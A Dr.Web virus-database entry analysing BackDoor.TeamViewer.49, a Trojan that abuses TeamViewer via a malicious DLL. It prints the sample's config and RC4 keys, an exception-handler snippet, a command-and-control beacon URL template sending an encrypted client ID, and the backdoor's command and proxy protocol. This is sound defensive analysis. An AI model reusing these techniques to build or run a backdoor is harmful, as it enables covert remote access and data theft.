Bibliothèque
Ma bibliothèque

+ Ajouter à la bibliothèque

Contacter-nous !
Support 24/24 | Rules regarding submitting

Nous téléphoner

0 825 300 230

Forum

Vos requêtes

  • Toutes : -
  • Non clôturées : -
  • Dernière : le -

Nous téléphoner

0 825 300 230

Profil

BackDoor.TeamViewer.49

Added to the Dr.Web virus database: 2016-05-06

Virus description added:

SHA1:

  • 9649ef7b594794daaf02da08c3b95a9f2f71149b (avicap32.dll)
  • 4884d44e2b4c2e2a65472068ef748f51385b13de (payload)

A Trojan for Microsoft Windows that is spread by Trojan.MulDrop6.39120. The Trojan's main payload is incorporated into the avicap32.dll library. Trojan.MulDrop6.39120 runs TeamViewer that automatically loads the library to the computer’s memory. All lines, imports, and functions of TeamViewer’s process are actively implemented by this malicious library. The most critical parts of the Trojan’s code are encrypted with base64 and RC4.

When running, the Trojan removes the icon of TeamViewer from the Windows notification area and disables error reporting. BackDoor.TeamViewer.49 also intercepts calls for some system functions to hide the TeamViewer window.

The Trojan determines the value of the HKLM\Software\Microsoft\Cryptography\MachineGUID system registry parameter and calculates MD5. The result of the calculation is the RC4 key and a name of the mutex that is used to control restart of the Trojan. In addition, the backdoor generates a global RC4 key using one of the TeamViewer functions.

BackDoor.TeamViewer.49 uses the configuration file named nv8moxflu that is located in the same directory as the Trojan itself. The first byte of the configuration file is a flag that specifies the encryption algorithm: if the byte equals to 1, the global key is used; if it is 0—the local one. Other information is encrypted with RC4. The configuration file of the examined sample looks as follows:

Section {Main}
       szsubKey "SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
       szvalueName "5s"
       szpgkey "rtpredimpku0hrq1le0d4cwqw7pcl97dv"
       szadminkey "i9igmhtliih115b5xlbpcwwc17qlbhse4"
SectionEnd

To decrypt other code blocks, the backdoor uses the MD5 value obtained from the “szadminkey” parameter. Then it parses the “Main” section of the configuration file, retrieves all parameters, and replaces the original file with its copy encrypted with the local key.

The Trojan launches a separate thread that, operating in infinite loop but with specified time intervals, assigns the folder, which contains its executable file, the malicious library and the configuration file, with the “hidden” and “system” attributes. If it fails to assign these attributes, the Trojan starts removing all the TeamViewer keys from the system registry.

HKCU\\Software\\TeamViewer\\Version6\\MachineFallback
HKCU\\Software\\TeamViewer\\Version6
HKCU\\Software\\TeamViewer

The backdoor registers itself in autorun intercepting calls for the hookRegOpenKeyExW function.

Then it installs Vectored Exception Handler and break points (0xcc) at the addresses of 0x5A7A84 and the MessageBoxW function.

To exclude such error codes as 0xC0000005 (STATUS_ACCESS_VIOLATION), 0xC0000374 (STATUS_HEAP_CORRUPTION), and 0x80000004 (STATUS_SINGLE_STEP), the following code is executed:

ContextRecord->SegDs = 35;
ContextRecord->EFlags |= 0x100u;
return EXCEPTION_CONTINUE_EXECUTION;

To exclude 0x80000003 (STATUS_BREAKPOINT), the Trojan first checks the address to which connection was established. If the address is 0x5A7A84, interception of the function call is set to the address that TeamViewer uses to call for WinVerifyTrust (dynamically-obtained import). The interception always returns “1”, which means “the signature is invalid”. Besides, the Trojan checks whether the exclusion address coincides with the MessageBoxW function address. If it does, the backdoor replaces the value of the EIP registry with its LoadEmbLib function and quits the exception handler.

The Trojan’s body contains one more encrypted library responsible for performing malicious activity. It is written in C++ using the boost library. The additional library is decrypted with the RC4 algorithm. The key is obtained from the szpgkey parameter of the configuration file. Then the library is loaded to the memory.

This library contains a specially-generated array that represents names of the server. The names are stored by bytes and are encrypted with the 0x18 byte using XOR.

When trying to connect, the backdoor uses User-Agent:

Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)

The following line is generated:

client_id=%.8x&connected=0&server_port=0&debug=0

where client_id is a serial number of the hard drive that stores the C section, The value is encrypted with the XOR operation using SID.

This line is encrypted with the “heyfg645fdhwi” RC4 key and is then encoded with bintohex. After that, the line is sent to the server as the following request:

http://<cnc>/analytics.php?c=<encoded_data>

The server’s reply is encoded with bintohex and is encrypted with RC4 as well.

The Trojan can execute the following commands received over HTTPS:

  • disconnect—terminate the connection;
  • idle—maintain the connection;
  • updips—update the auth_ip list with the one specified in the command received;
  • connect—connect to the specified host server. The command must consist of the following parameters:
  • ip—host server’s IP address;
  • auth_swith—use authorization. If the value is set to “1”, the Trojan receives the auth_login and auth_pass parameters. If the value is “0”, the Trojan gets the auth_ip parameter. Otherwise, the connection will not be established.
  • auth_ip—IP authentication;
  • auth_login—login;
  • auth_pass—password.

Other network activity is written using boost::asio::stream_socket_service and is performed via a binary protocol.

The Trojan can execute the following commands received over the binary protocol:

  • Authentication—depending on the auth_swith parameter, the Trojan sends either data on the auth_ip parameter or auth_login and auth_pass.
  • Keep-Alive (0x01)—maintains the connection to the server.
  • Send Data (0x02)—searches for the signature in the Trojan’s body:
    C8 1F 0E 8D 4A 97 06 2A BC B8 3A D0 30 92 2E 59
    and sends the number of bytes specified by the server.
  • Proxy (0x00)—redirects traffic from the C&C server to the remote host server specified by the server.

News about the Trojan

Recommandations pour le traitement

  1. Si le système d'exploitation peut être démarré (en mode normal ou en mode sans échec), téléchargez Dr.Web Security Space et lancez un scan complet de votre ordinateur et de tous les supports amovibles que vous utilisez. En savoir plus sur Dr.Web Security Space.
  2. Si le démarrage du système d'exploitation est impossible, veuillez modifier les paramètres du BIOS de votre ordinateur pour démarrer votre ordinateur via CD/DVD ou clé USB. Téléchargez l'image du disque de secours de restauration du système Dr.Web® LiveDisk ou l'utilitaire pour enregistrer Dr.Web® LiveDisk sur une clé USB, puis préparez la clé USB appropriée. Démarrez l'ordinateur à l'aide de cette clé et lancez le scan complet et le traitement des menaces détectées.

Veuillez lancer le scan complet du système à l'aide de Dr.Web Antivirus pour Mac OS.

Veuillez lancer le scan complet de toutes les partitions du disque à l'aide de Dr.Web Antivirus pour Linux.

  1. Si votre appareil mobile fonctionne correctement, veuillez télécharger et installer sur votre appareil mobile Dr.Web pour Android. Lancez un scan complet et suivez les recommandations sur la neutralisation des menaces détectées.
  2. Si l'appareil mobile est bloqué par le Trojan de la famille Android.Locker (un message sur la violation grave de la loi ou la demande d'une rançon est affiché sur l'écran de l'appareil mobile), procédez comme suit:
    • démarrez votre Smartphone ou votre tablette en mode sans échec (si vous ne savez pas comment faire, consultez la documentation de l'appareil mobile ou contactez le fabricant) ;
    • puis téléchargez et installez sur votre appareil mobile Dr.Web pour Android et lancez un scan complet puis suivez les recommandations sur la neutralisation des menaces détectées ;
    • Débranchez votre appareil et rebranchez-le.

En savoir plus sur Dr.Web pour Android